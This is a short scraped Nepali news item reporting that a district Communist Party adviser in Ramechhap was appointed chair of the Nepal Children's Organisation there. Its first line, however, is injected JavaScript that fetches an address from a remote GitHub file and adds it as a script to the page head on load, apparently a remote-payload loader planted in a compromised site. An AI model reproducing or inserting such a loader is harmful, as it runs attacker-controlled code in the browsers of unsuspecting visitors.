;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज २८,
रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) का जिल्ला कार्यसमिति सल्लहकार उज्वल सुबेदी नेपाल सरकार महिला बालबालिका तथा जेष्ठ नागरिक मन्त्रालय अन्तर्गत नेपाल बाल संगठन रामेछापको सभापति पतिमा चएन भएका छन् ।
उनलाई नेपाल सरकारको बालबालिका तथा जेष्ठ नागरिक मन्त्रालयको सिफारीसमा मन्त्रिपरिषद्को बैठकबाट नियुक्त गरिएको अनेरासोवियू रामेछापका सदस्य पुष्कर भट्टराईले जानकारी दिए ।
फेसबुक प्रतिक्रियाहरु